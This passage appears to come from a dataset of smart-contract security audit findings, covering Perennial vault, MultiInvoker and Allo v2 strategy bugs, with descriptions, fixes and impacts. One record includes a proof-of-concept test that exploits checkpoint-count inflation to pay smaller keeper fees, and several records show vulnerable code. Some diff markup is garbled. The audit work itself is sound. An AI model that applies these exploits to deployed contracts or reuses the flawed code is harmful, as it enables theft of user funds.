UFixed6Lib.ZERO : self.keeper.div(UFixed6Lib.from(self.count));\\n return _withoutKeeper(amount, keeperPer);\\n }\\n```\\n\\nAlso notice that in `processLocal` the only thing which keeper fees influence are deposits and redemptions, but not claims.\\nThe scenario above is demonstrated in the test, add this to Vault.test.ts:\\n```\\nit('inflate checkpoint count', async () => {\\n const settlementFee = parse6decimal('10.00')\\n const marketParameter = { // rest of code(await market.parameter()) }\\n marketParameter.settlementFee = settlementFee\\n await market.connect(owner).updateParameter(marketParameter)\\n const btcMarketParameter = { // rest of code(await btcMarket.parameter()) }\\n btcMarketParameter.settlementFee = settlementFee\\n await btcMarket.connect(owner).updateParameter(btcMarketParameter)\\n\\n const deposit = parse6decimal('10000')\\n await vault.connect(user).update(user.address, deposit, 0, 0)\\n await updateOracle()\\n await vault.settle(user.address)\\n\\n const deposit2 = parse6decimal('10000')\\n await vault.connect(user2).update(user2.address, deposit2, 0, 0)\\n\\n // inflate checkpoint.count\\n await vault.connect(btcUser1).update(btcUser1.address, 0, 0, 0)\\n await vault.connect(btcUser2).update(btcUser2.address, 0, 0, 0)\\n\\n await updateOracle()\\n await vault.connect(user2).settle(user2.address)\\n\\n const checkpoint2 = await vault.checkpoints(3)\\n console.log(""checkpoint count = "" + checkpoint2.count)\\n\\n var account = await vault.accounts(user.address);\\n var assets = await vault.convertToAssets(account.shares);\\n console.log(""User shares:"" + account.shares + "" assets: "" + assets);\\n var account = await vault.accounts(user2.address);\\n var assets = await vault.convertToAssets(account.shares);\\n console.log(""User2 shares:"" + account.shares + "" assets: "" + assets);\\n})\\n```\\n\\nConsole output:\\n```\\ncheckpoint count = 3\\nUser shares:10000000000 assets: 9990218973\\nUser2 shares:10013140463 assets: 
10003346584\\n```\\n\\nSo the user2 inflates his deposited amounts by paying smaller keeper fee.\\nIf 2 lines which inflate checkpoint count (after corresponding comment) are deleted, then the output is:\\n```\\ncheckpoint count = 1\\nUser shares:10000000000 assets: 9990218973\\nUser2 shares:9999780702 assets: 9989999890\\n```\\n\\nSo if not inflated, user2 pays correct amount and has roughly the same assets as user1 after his deposit.","Consider reverting (0,0,0) vault updates, or maybe redirecting to `settle` in this case. Additionally, consider updating checkpoint only if `depositAssets` or `redeemShares` are not zero:\\n```\\nif (!depositAssets.isZero() || !redeemShares.isZero())\\n context.currentCheckpoint.update(depositAssets, redeemShares);\\n```\\n",Malicious vault user can inflate `checkpoint.count` to pay much smaller keeper fee than they should at the expense of the other vault users.,"```\\n// invariant\\n// @audit operator - pass\\nif (msg.sender != account && !IVaultFactory(address(factory())).operators(account, msg.sender))\\n revert VaultNotOperatorError();\\n// @audit 0,0,0 is single-sided - pass\\nif (!depositAssets.add(redeemShares).add(claimAssets).eq(depositAssets.max(redeemShares).max(claimAssets)))\\n revert VaultNotSingleSidedError();\\n// @audit depositAssets == 0 - pass\\nif (depositAssets.gt(_maxDeposit(context)))\\n revert VaultDepositLimitExceededError();\\n// @audit redeemShares == 0 - pass\\nif (redeemShares.gt(_maxRedeem(context)))\\n revert VaultRedemptionLimitExceededError();\\n// @audit depositAssets == 0 - pass\\nif (!depositAssets.isZero() && depositAssets.lt(context.settlementFee))\\n revert VaultInsufficientMinimumError();\\n// @audit redeemShares == 0 - pass\\nif (!redeemShares.isZero() && context.latestCheckpoint.toAssets(redeemShares, context.settlementFee).isZero())\\n revert VaultInsufficientMinimumError();\\n// @audit since this will be called by **different** users in the same epoch, this will also pass\\nif 
(context.local.current != context.local.latest) revert VaultExistingOrderError();\\n```\\n" +MultiInvoker liquidation action will revert most of the time due to incorrect closable amount initialization,medium,"`MultiInvoker` calculates the `closable` amount in its `_latest` function incorrectly. In particular, it doesn't initialize `closableAmount`, so it's set to 0 initially. It then scans pending positions, settling those which should be settled, and reducing `closableAmount` if necessary for remaining pending positions:\\n```\\nfunction _latest(\\n IMarket market,\\n address account\\n) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load parameters from the market\\n IPayoffProvider payoff = market.payoff();\\n\\n // load latest settled position and price\\n uint256 latestTimestamp = market.oracle().latest().timestamp;\\n latestPosition = market.positions(account);\\n latestPrice = market.global().latestPrice;\\n UFixed6 previousMagnitude = latestPosition.magnitude();\\n\\n // @audit-issue Should add:\\n // closableAmount = previousMagnitude;\\n // otherwise if no position is settled in the following loop, closableAmount incorrectly remains 0\\n\\n // scan pending position for any ready-to-be-settled positions\\n Local memory local = market.locals(account);\\n for (uint256 id = local.latestId + 1; id <= local.currentId; id++) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // load oracle version for that position\\n OracleVersion memory oracleVersion = market.oracle().at(pendingPosition.timestamp);\\n if (address(payoff) != address(0)) oracleVersion.price = payoff.payoff(oracleVersion.price);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n if 
(oracleVersion.valid) latestPrice = oracleVersion.price;\\n\\n previousMagnitude = latestPosition.magnitude();\\n@@@ closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n }\\n}\\n```\\n\\nNotice, that `closableAmount` is initialized to `previousMagnitude` only if there is at least one position that needs to be settled. However, if `local.latestId == local.currentId` (which is the case for most of the liquidations - position becomes liquidatable due to price changes without any pending positions created by the user), this loop is skipped entirely, never setting `closableAmount`, so it's incorrectly returned as 0, although it's not 0 (it should be the latest settled position magnitude).\\nSince `LIQUIDATE` action of `MultiInvoker` uses `_latest` to calculate `closableAmount` and `liquidationFee`, these values will be calculated incorrectly and will revert when trying to update the market. See the `_liquidate` market update reducing `currentPosition` by `closable` (which is 0 when it must be bigger):\\n```\\nmarket.update(\\n account,\\n currentPosition.maker.isZero() ? UFixed6Lib.ZERO : currentPosition.maker.sub(closable),\\n currentPosition.long.isZero() ? UFixed6Lib.ZERO : currentPosition.long.sub(closable),\\n currentPosition.short.isZero() ? 
UFixed6Lib.ZERO : currentPosition.short.sub(closable),\\n Fixed6Lib.from(-1, liquidationFee),\\n true\\n);\\n```\\n\\nThis line will revert because `Market._invariant` verifies that `closableAmount` must be 0 after updating liquidated position:\\n```\\nif (protected && (\\n@@@ !closableAmount.isZero() ||\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n collateralAfterFees.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n)) revert MarketInvalidProtectionError();\\n```\\n","Initialize `closableAmount` to previousMagnitude:\\n```\\n function _latest(\\n IMarket market,\\n address account\\n ) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load parameters from the market\\n IPayoffProvider payoff = market.payoff();\\n\\n // load latest settled position and price\\n uint256 latestTimestamp = market.oracle().latest().timestamp;\\n latestPosition = market.positions(account);\\n latestPrice = market.global().latestPrice;\\n UFixed6 previousMagnitude = latestPosition.magnitude();\\n+ closableAmount = previousMagnitude;\\n```\\n","All `MultiInvoker` liquidation actions will revert if trying to liquidate users without positions which can be settled, which can happen in 2 cases:\\nLiquidated user doesn't have any pending positions at all (local.latestId == local.currentId). This is the most common case (price has changed and user is liquidated without doing any actions) and we can reasonably expect that this will be the case for at least 50% of liquidations (probably more, like 80-90%).\\nLiquidated user does have pending positions, but no pending position is ready to be settled yet. 
For example, if liquidator commits unrequested oracle version which liquidates user, even if the user already has pending position (but which is not yet ready to be settled).\\nSince this breaks important `MultiInvoker` functionality in most cases and causes loss of funds to liquidator (revert instead of getting liquidation fee), I believe this should be High severity.","```\\nfunction _latest(\\n IMarket market,\\n address account\\n) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load parameters from the market\\n IPayoffProvider payoff = market.payoff();\\n\\n // load latest settled position and price\\n uint256 latestTimestamp = market.oracle().latest().timestamp;\\n latestPosition = market.positions(account);\\n latestPrice = market.global().latestPrice;\\n UFixed6 previousMagnitude = latestPosition.magnitude();\\n\\n // @audit-issue Should add:\\n // closableAmount = previousMagnitude;\\n // otherwise if no position is settled in the following loop, closableAmount incorrectly remains 0\\n\\n // scan pending position for any ready-to-be-settled positions\\n Local memory local = market.locals(account);\\n for (uint256 id = local.latestId + 1; id <= local.currentId; id++) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // load oracle version for that position\\n OracleVersion memory oracleVersion = market.oracle().at(pendingPosition.timestamp);\\n if (address(payoff) != address(0)) oracleVersion.price = payoff.payoff(oracleVersion.price);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n if (oracleVersion.valid) latestPrice = oracleVersion.price;\\n\\n previousMagnitude = latestPosition.magnitude();\\n@@@ closableAmount = previousMagnitude;\\n\\n 
// process pending positions\\n } else {\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n }\\n}\\n```\\n" +MultiInvoker liquidation action will revert due to incorrect closable amount calculation for invalid oracle versions,medium,"`MultiInvoker` calculates the `closable` amount in its `_latest` function. This function basically repeats the logic of `Market._settle`, but fails to repeat it correctly for the invalid oracle version settlement. When invalid oracle version is settled, `latestPosition` invalidation should increment, but the `latestPosition` should remain the same. This is achieved in the `Market._processPositionLocal` by adjusting `newPosition` after invalidation before the `latestPosition` is set to newPosition:\\n```\\nif (!version.valid) context.latestPosition.local.invalidate(newPosition);\\nnewPosition.adjust(context.latestPosition.local);\\n// rest of code\\ncontext.latestPosition.local.update(newPosition);\\n```\\n\\nHowever, `MultiInvoker` doesn't adjust the new position and simply sets `latestPosition` to new position both when oracle is valid or invalid:\\n```\\nif (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\nlatestPosition.update(pendingPosition);\\n```\\n\\nThis leads to incorrect value of `closableAmount` afterwards:\\n```\\npreviousMagnitude = latestPosition.magnitude();\\nclosableAmount = previousMagnitude;\\n```\\n\\nFor example, if `latestPosition.market = 10`, `pendingPosition.market = 0` and pendingPosition has invalid oracle, then:\\n`Market` will invalidate (latestPosition.invalidation.market = 10), adjust (pendingPosition.market = 10), set `latestPosition` to new `pendingPosition` (latestPosition.maker = pendingPosition.maker = 10), so `latestPosition.maker` correctly remains 10.\\n`MultiInvoker` will invalidate (latestPosition.invalidation.market = 10), and immediately set 
`latestPosition` to `pendingPosition` (latestPosition.maker = pendingPosition.maker = 0), so `latestPosition.maker` is set to 0 incorrectly.\\nSince `LIQUIDATE` action of `MultiInvoker` uses `_latest` to calculate `closableAmount` and `liquidationFee`, these values will be calculated incorrectly and will revert when trying to update the market. See the `_liquidate` market update reducing `currentPosition` by `closable` (which is 0 when it must be bigger):\\n```\\nmarket.update(\\n account,\\n currentPosition.maker.isZero() ? UFixed6Lib.ZERO : currentPosition.maker.sub(closable),\\n currentPosition.long.isZero() ? UFixed6Lib.ZERO : currentPosition.long.sub(closable),\\n currentPosition.short.isZero() ? UFixed6Lib.ZERO : currentPosition.short.sub(closable),\\n Fixed6Lib.from(-1, liquidationFee),\\n true\\n);\\n```\\n\\nThis line will revert because `Market._invariant` verifies that `closableAmount` must be 0 after updating liquidated position:\\n```\\nif (protected && (\\n@@@ !closableAmount.isZero() ||\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n collateralAfterFees.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n)) revert MarketInvalidProtectionError();\\n```\\n","Both `Market` and `MultiInvoker` handle position settlement for invalid oracle versions incorrectly (Market issue with this was reported separately as it's completely different), so both should be fixed and the fix of this one will depend on how the `Market` bug is fixed. The way it is, `MultiInvoker` correctly adjusts pending position before invalidating `latestPosition` (which `Market` fails to do), however after such action `pendingPosition` must not be adjusted, because it was already adjusted and new adjustment should only change it by the difference from the last invalidation. 
The easier solution would be just not to change `latestPosition` in case of invalid oracle version, so the fix might be like this (just add else):\\n```\\n if (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\n else latestPosition.update(pendingPosition);\\n```\\n\\nHowever, if the `Market` bug is fixed the way I proposed it (by changing `invalidate` function to take into account difference in invalidation of `latestPosition` and pendingPosition), then this fix will still be incorrect, because `invalidate` will expect unadjusted `pendingPosition`, so in this case `pendingPosition` should not be adjusted after loading it, but it will have to be adjusted for positions not yet settled. So the fix might look like this:\\n```\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n- pendingPosition.adjust(latestPosition);\\n\\n // load oracle version for that position\\n OracleVersion memory oracleVersion = market.oracle().at(pendingPosition.timestamp);\\n if (address(payoff) != address(0)) oracleVersion.price = payoff.payoff(oracleVersion.price);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\n- latestPosition.update(pendingPosition);\\n+ else {\\n+ pendingPosition.adjust(latestPosition);\\n+ latestPosition.update(pendingPosition);\\n+ }\\n if (oracleVersion.valid) latestPrice = oracleVersion.price;\\n\\n previousMagnitude = latestPosition.magnitude();\\n closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n+ pendingPosition.adjust(latestPosition);\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n```\\n","If there is an invalid oracle version during pending position settlement in `MultiInvoker` liquidation action, it will incorrectly revert and will cause loss of 
funds for the liquidator who should have received liquidation fee, but reverts instead.\\nSince this breaks important `MultiInvoker` functionality in some rare edge cases (invalid oracle version, user has unsettled position which should settle during user liquidation with `LIQUIDATION` action of MultiInvoker), this should be a valid medium finding.",```\\nif (!version.valid) context.latestPosition.local.invalidate(newPosition);\\nnewPosition.adjust(context.latestPosition.local);\\n// rest of code\\ncontext.latestPosition.local.update(newPosition);\\n```\\n +Invalid oracle version can cause the vault to open too large and risky position and get liquidated due to using unadjusted global current position,medium,"`StrategyLib._loadContext` for the market loads `currentPosition` as:\\n```\\ncontext.currentPosition = registration.market.pendingPosition(global.currentId);\\n```\\n\\nHowever, this is unadjusted position, so its value is incorrect if invalid oracle version happens while this position is pending.\\nLater on, when calculating minimum and maximum positions enforced by the vault in the market, they're calculated in _positionLimit:\\n```\\nfunction _positionLimit(MarketContext memory context) private pure returns (UFixed6, UFixed6) {\\n return (\\n // minimum position size before crossing the net position\\n context.currentAccountPosition.maker.sub(\\n context.currentPosition.maker\\n .sub(context.currentPosition.net().min(context.currentPosition.maker))\\n .min(context.currentAccountPosition.maker)\\n .min(context.closable)\\n ),\\n // maximum position size before crossing the maker limit\\n context.currentAccountPosition.maker.add(\\n context.riskParameter.makerLimit\\n .sub(context.currentPosition.maker.min(context.riskParameter.makerLimit))\\n )\\n );\\n}\\n```\\n\\nAnd the target maker size for the market is set in allocate:\\n```\\n(targets[marketId].collateral, targets[marketId].position) = (\\n 
Fixed6Lib.from(_locals.marketCollateral).sub(contexts[marketId].local.collateral),\\n _locals.marketAssets\\n .muldiv(registrations[marketId].leverage, contexts[marketId].latestPrice.abs())\\n .min(_locals.maxPosition)\\n .max(_locals.minPosition)\\n);\\n```\\n\\nSince `context.currentPosition` is incorrect, it can happen that both `_locals.minPosition` and `_locals.maxPosition` are too high, the vault will open too large and risky position, breaking its risk limit and possibly getting liquidated, especially if it happens during high volatility.",Adjust global current position after loading it:\\n```\\n context.currentPosition = registration.market.pendingPosition(global.currentId);\\n+ context.currentPosition.adjust(registration.market.position());\\n```\\n,"If invalid oracle version happens, the vault might open too large and risky position in such market, potentially getting liquidated and vault users losing funds due to this liquidation.",```\\ncontext.currentPosition = registration.market.pendingPosition(global.currentId);\\n```\\n +`QVSimpleStrategy` never updates `allocator.voiceCredits`.,high,"```\\n function _allocate(bytes memory _data, address _sender) internal virtual override {\\n …\\n\\n // check that the recipient has voice credits left to allocate\\n if (!_hasVoiceCreditsLeft(voiceCreditsToAllocate, allocator.voiceCredits)) revert INVALID();\\n\\n _qv_allocate(allocator, recipient, recipientId, voiceCreditsToAllocate, _sender);\\n }\\n```\\n\\n```\\n function _hasVoiceCreditsLeft(uint256 _voiceCreditsToAllocate, uint256 _allocatedVoiceCredits)\\n internal\\n view\\n override\\n returns (bool)\\n {\\n return _voiceCreditsToAllocate + _allocatedVoiceCredits <= maxVoiceCreditsPerAllocator;\\n }\\n```\\n\\nThe problem is that `allocator.voiceCredits` is always zero. Both `QVSimpleStrategy` and `QVBaseStrategy` don't update `allocator.voiceCredits`. 
Thus, allocators can cast more votes than `maxVoiceCreditsPerAllocator`.","Updates `allocator.voiceCredits` in `QVSimpleStrategy._allocate`.\\n```\\n function _allocate(bytes memory _data, address _sender) internal virtual override {\\n …\\n\\n // check that the recipient has voice credits left to allocate\\n if (!_hasVoiceCreditsLeft(voiceCreditsToAllocate, allocator.voiceCredits)) revert INVALID();\\n// Add the line below\\n allocator.voiceCredits // Add the line below\\n= voiceCreditsToAllocate;\\n _qv_allocate(allocator, recipient, recipientId, voiceCreditsToAllocate, _sender);\\n }\\n```\\n",Every allocator has an unlimited number of votes.,"```\\n function _allocate(bytes memory _data, address _sender) internal virtual override {\\n …\\n\\n // check that the recipient has voice credits left to allocate\\n if (!_hasVoiceCreditsLeft(voiceCreditsToAllocate, allocator.voiceCredits)) revert INVALID();\\n\\n _qv_allocate(allocator, recipient, recipientId, voiceCreditsToAllocate, _sender);\\n }\\n```\\n" +`recipientsCounter` should start from 1 in `DonationVotingMerkleDistributionBaseStrategy`,high,"```\\n function _registerRecipient(bytes memory _data, address _sender)\\n internal\\n override\\n onlyActiveRegistration\\n returns (address recipientId)\\n {\\n …\\n\\n uint8 currentStatus = _getUintRecipientStatus(recipientId);\\n\\n if (currentStatus == uint8(Status.None)) {\\n // recipient registering new application\\n recipientToStatusIndexes[recipientId] = recipientsCounter;\\n _setRecipientStatus(recipientId, uint8(Status.Pending));\\n\\n bytes memory extendedData = abi.encode(_data, recipientsCounter);\\n emit Registered(recipientId, extendedData, _sender);\\n\\n recipientsCounter++;\\n } else {\\n if (currentStatus == uint8(Status.Accepted)) {\\n // recipient updating accepted application\\n _setRecipientStatus(recipientId, uint8(Status.Pending));\\n } else if (currentStatus == uint8(Status.Rejected)) {\\n // recipient updating rejected application\\n 
_setRecipientStatus(recipientId, uint8(Status.Appealed));\\n }\\n emit UpdatedRegistration(recipientId, _data, _sender, _getUintRecipientStatus(recipientId));\\n }\\n }\\n```\\n\\n```\\n function _getUintRecipientStatus(address _recipientId) internal view returns (uint8 status) {\\n // Get the column index and current row\\n (, uint256 colIndex, uint256 currentRow) = _getStatusRowColumn(_recipientId);\\n\\n // Get the status from the 'currentRow' shifting by the 'colIndex'\\n status = uint8((currentRow colIndex) & 15);\\n\\n // Return the status\\n return status;\\n }\\n```\\n\\n```\\n function _getStatusRowColumn(address _recipientId) internal view returns (uint256, uint256, uint256) {\\n uint256 recipientIndex = recipientToStatusIndexes[_recipientId];\\n\\n uint256 rowIndex = recipientIndex / 64; // 256 / 4\\n uint256 colIndex = (recipientIndex % 64) * 4;\\n\\n return (rowIndex, colIndex, statusesBitMap[rowIndex]);\\n }\\n```\\n\\n```\\n /// @notice The total number of recipients.\\n uint256 public recipientsCounter;\\n```\\n\\nConsider the following situation:\\nAlice is the first recipient calls `registerRecipient`\\n```\\n// in _registerRecipient\\nrecipientToStatusIndexes[Alice] = recipientsCounter = 0;\\n_setRecipientStatus(Alice, uint8(Status.Pending));\\nrecipientCounter++\\n```\\n\\nBob calls `registerRecipient`.\\n```\\n// in _getStatusRowColumn\\nrecipientToStatusIndexes[Bob] = 0 // It would access the status of Alice\\n// in _registerRecipient\\ncurrentStatus = _getUintRecipientStatus(recipientId) = Status.Pending\\ncurrentStatus != uint8(Status.None) -> no new application is recorded in the pool.\\n```\\n\\nThis implementation error makes the pool can only record the first application.","Make the counter start from 1. 
There are two methods to fix the issue.\\n\\n```\\n /// @notice The total number of recipients.\\n// Add the line below\\n uint256 public recipientsCounter;\\n// Remove the line below\\n uint256 public recipientsCounter;\\n```\\n\\n\\n```\\n function _registerRecipient(bytes memory _data, address _sender)\\n internal\\n override\\n onlyActiveRegistration\\n returns (address recipientId)\\n {\\n …\\n\\n uint8 currentStatus = _getUintRecipientStatus(recipientId);\\n\\n if (currentStatus == uint8(Status.None)) {\\n // recipient registering new application\\n// Add the line below\\n recipientToStatusIndexes[recipientId] = recipientsCounter // Add the line below\\n 1;\\n// Remove the line below\\n recipientToStatusIndexes[recipientId] = recipientsCounter;\\n _setRecipientStatus(recipientId, uint8(Status.Pending));\\n\\n bytes memory extendedData = abi.encode(_data, recipientsCounter);\\n emit Registered(recipientId, extendedData, _sender);\\n\\n recipientsCounter// Add the line below\\n// Add the line below\\n;\\n …\\n }\\n```\\n",,"```\\n function _registerRecipient(bytes memory _data, address _sender)\\n internal\\n override\\n onlyActiveRegistration\\n returns (address recipientId)\\n {\\n …\\n\\n uint8 currentStatus = _getUintRecipientStatus(recipientId);\\n\\n if (currentStatus == uint8(Status.None)) {\\n // recipient registering new application\\n recipientToStatusIndexes[recipientId] = recipientsCounter;\\n _setRecipientStatus(recipientId, uint8(Status.Pending));\\n\\n bytes memory extendedData = abi.encode(_data, recipientsCounter);\\n emit Registered(recipientId, extendedData, _sender);\\n\\n recipientsCounter++;\\n } else {\\n if (currentStatus == uint8(Status.Accepted)) {\\n // recipient updating accepted application\\n _setRecipientStatus(recipientId, uint8(Status.Pending));\\n } else if (currentStatus == uint8(Status.Rejected)) {\\n // recipient updating rejected application\\n _setRecipientStatus(recipientId, uint8(Status.Appealed));\\n }\\n emit 
UpdatedRegistration(recipientId, _data, _sender, _getUintRecipientStatus(recipientId));\\n }\\n }\\n```\\n" +`Registry.sol` generate clone `Anchor.sol` never work. Profile owner cannot use their `Anchor` wallet,high,"Add this test to `Registry.t.sol` test file to reproduce the issue.\\n```\\n function test_Audit_createProfile() public {\\n // create profile\\n bytes32 newProfileId = registry().createProfile(nonce, name, metadata, profile1_owner(), profile1_members());\\n Registry.Profile memory profile = registry().getProfileById(newProfileId);\\n Anchor _anchor = Anchor(payable(profile.anchor));\\n\\n console.log(""registry address: %s"", address(registry()));\\n console.log(""anchor address: %s"", profile.anchor);\\n console.log(""anchor.registry: %s"", address(_anchor.registry()));\\n\\n emit log_named_bytes32(""profile.id"", profile.id);\\n emit log_named_bytes32(""anchor.profile.id"", _anchor.profileId());\\n\\n Anchor _anchor_proxy = Anchor(payable(address( _anchor.registry())));\\n assertEq(address(registry()),address(_anchor.registry()) ,""wrong anchor registry"");\\n }\\n```\\n\\nWhat happen with `Anchor.sol` is it expect `msg.sender` is `Registry` contract. But in reality `msg.sender` is a proxy contract generated by Solady during `CREATE3` operation.\\n```\\n constructor(bytes32 _profileId) {\\n registry = Registry(msg.sender);//@audit H Registry address here is not Registry. msg.sender is a proxy contract. Create3 deploy 2 contract. one is proxy. other is actual bytecode.\\n profileId = _profileId;\\n }\\n```\\n\\nThis can be seen with Solady comment for proxy contract. `msg.sender` above is middleman proxy contract. Not `Registry` contract. Solady generate 2 contract during CREATE3 operation. One is proxy contract. 
Second is actual bytecode.","Move `msg.sender` into constructor parameter\\n```\\nFile: allo-v2\\contracts\\core\\Registry.sol\\n bytes memory creationCode = abi.encodePacked(type(Anchor).creationCode, abi.encode(_profileId, address(this))); //@audit fix creation code\\n\\n // Use CREATE3 to deploy the anchor contract\\n anchor = CREATE3.deploy(salt, creationCode, 0); \\nFile: allo-v2\\contracts\\core\\Anchor.sol\\n constructor(bytes32 _profileId, address _registry) {\\n registry = Registry(_registry);\\n profileId = _profileId;\\n }\\n```\\n","`Anchor.execute()` function will not work because `registry` address point to empty proxy contract and not actual `Registry` so all call will revert.\\n```\\nFile: allo-v2\\contracts\\core\\Anchor.sol\\n function execute(address _target, uint256 _value, bytes memory _data) external returns (bytes memory) {\\n // Check if the caller is the owner of the profile and revert if not\\n if (!registry.isOwnerOfProfile(profileId, msg.sender)) revert UNAUTHORIZED();\\n```\\n\\nProfile owner cannot use their wallet `Anchor`. 
All funds send to this `Anchor` contract will be lost forever.","```\\n function test_Audit_createProfile() public {\\n // create profile\\n bytes32 newProfileId = registry().createProfile(nonce, name, metadata, profile1_owner(), profile1_members());\\n Registry.Profile memory profile = registry().getProfileById(newProfileId);\\n Anchor _anchor = Anchor(payable(profile.anchor));\\n\\n console.log(""registry address: %s"", address(registry()));\\n console.log(""anchor address: %s"", profile.anchor);\\n console.log(""anchor.registry: %s"", address(_anchor.registry()));\\n\\n emit log_named_bytes32(""profile.id"", profile.id);\\n emit log_named_bytes32(""anchor.profile.id"", _anchor.profileId());\\n\\n Anchor _anchor_proxy = Anchor(payable(address( _anchor.registry())));\\n assertEq(address(registry()),address(_anchor.registry()) ,""wrong anchor registry"");\\n }\\n```\\n" +`fundPool` does not work with fee-on-transfer token,medium,"In `_fundPool`, the parameter for `increasePoolAmount` is directly the amount used in the `transferFrom` call.\\n```\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: address(_strategy), amount: amountAfterFee}));\\n _strategy.increasePoolAmount(amountAfterFee);\\n```\\n\\nWhen `_token` is a fee-on-transfer token, the actual amount transferred to `_strategy` will be less than `amountAfterFee`. Therefore, the current approach could lead to a recorded balance that is greater than the actual balance.",Use the change in `_token` balance as the parameter for `increasePoolAmount`.,`fundPool` does not work with fee-on-transfer token,"```\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: address(_strategy), amount: amountAfterFee}));\\n _strategy.increasePoolAmount(amountAfterFee);\\n```\\n" +Exponential Inflation of Voice Credits in Quadratic Voting Strategy,medium,"In the given code snippet, we observe a potential issue in the way voice credits are being accumulated for each recipient. 
The specific lines of code in question are:\\n```\\nfunction _qv_allocate(\\n // rest of code\\n ) internal onlyActiveAllocation {\\n // rest of code\\n uint256 creditsCastToRecipient = _allocator.voiceCreditsCastToRecipient[_recipientId];\\n // rest of code\\n // get the total credits and calculate the vote result\\n uint256 totalCredits = _voiceCreditsToAllocate + creditsCastToRecipient;\\n // rest of code\\n //E update allocator mapping voice for this recipient\\n _allocator.voiceCreditsCastToRecipient[_recipientId] += totalCredits; //E @question should be only _voiceCreditsToAllocate\\n // rest of code\\n }\\n```\\n\\nWe can see that at the end :\\n```\\n_allocator.voiceCreditsCastToRecipient[_recipientId] = _allocator.voiceCreditsCastToRecipient[_recipientId] + _voiceCreditsToAllocate + _allocator.voiceCreditsCastToRecipient[_recipientId];\\n```\\n\\nHere, totalCredits accumulates both the newly allocated voice credits (_voiceCreditsToAllocate) and the credits previously cast to this recipient (creditsCastToRecipient). 
Later on, this totalCredits is added again to `voiceCreditsCastToRecipient[_recipientId]`, thereby including the previously cast credits once more\\nProof of Concept (POC):\\nLet's consider a scenario where a user allocates credits in three separate transactions:\\nTransaction 1: Allocates 5 credits\\ncreditsCastToRecipient initially is 0\\ntotalCredits = 5 (5 + 0)\\nNew voiceCreditsCastToRecipient[_recipientId] = 5\\nTransaction 2: Allocates another 5 credits\\ncreditsCastToRecipient now is 5 (from previous transaction)\\ntotalCredits = 10 (5 + 5)\\nNew voiceCreditsCastToRecipient[_recipientId] = 15 (10 + 5)\\nTransaction 3: Allocates another 5 credits\\ncreditsCastToRecipient now is 15\\ntotalCredits = 20 (5 + 15)\\nNew voiceCreditsCastToRecipient[_recipientId] = 35 (20 + 15)\\nFrom the above, we can see that the voice credits cast to the recipient are exponentially growing with each transaction instead of linearly increasing by 5 each time",Code should be modified to only add the new voice credits to the recipient's tally. 
The modified line of code should look like:\\n```\\n_allocator.voiceCreditsCastToRecipient[_recipientId] += _voiceCreditsToAllocate;\\n```\\n,"Exponential increase in the voice credits attributed to a recipient, significantly skewing the results of the voting strategy( if one recipient receive 15 votes in one vote and another one receive 5 votes 3 times, the second one will have 20 votes and the first one 15) Over time, this could allow for manipulation and loss of trust in the voting mechanism and the percentage of amount received by recipients as long as allocations are used to calculate the match amount they will receive from the pool amount.",```\\nfunction _qv_allocate(\\n // rest of code\\n ) internal onlyActiveAllocation {\\n // rest of code\\n uint256 creditsCastToRecipient = _allocator.voiceCreditsCastToRecipient[_recipientId];\\n // rest of code\\n // get the total credits and calculate the vote result\\n uint256 totalCredits = _voiceCreditsToAllocate + creditsCastToRecipient;\\n // rest of code\\n //E update allocator mapping voice for this recipient\\n _allocator.voiceCreditsCastToRecipient[_recipientId] += totalCredits; //E @question should be only _voiceCreditsToAllocate\\n // rest of code\\n }\\n```\\n +RFPSimpleStrategy milestones can be set multiple times,medium,"The `setMilestones` function in `RFPSimpleStrategy` contract checks if `MILESTONES_ALREADY_SET` or not by `upcomingMilestone` index.\\n```\\nif (upcomingMilestone != 0) revert MILESTONES_ALREADY_SET();\\n```\\n\\nBut `upcomingMilestone` increases only after distribution, and until this time will always be equal to 0.",Fix condition if milestones should only be set once.\\n```\\nif (milestones.length > 0) revert MILESTONES_ALREADY_SET();\\n```\\n\\nOr allow milestones to be reset while they are not in use.\\n```\\nif (milestones.length > 0) {\\n if (milestones[0].milestoneStatus != Status.None) revert MILESTONES_ALREADY_IN_USE();\\n delete milestones;\\n}\\n```\\n,"It can accidentally break 
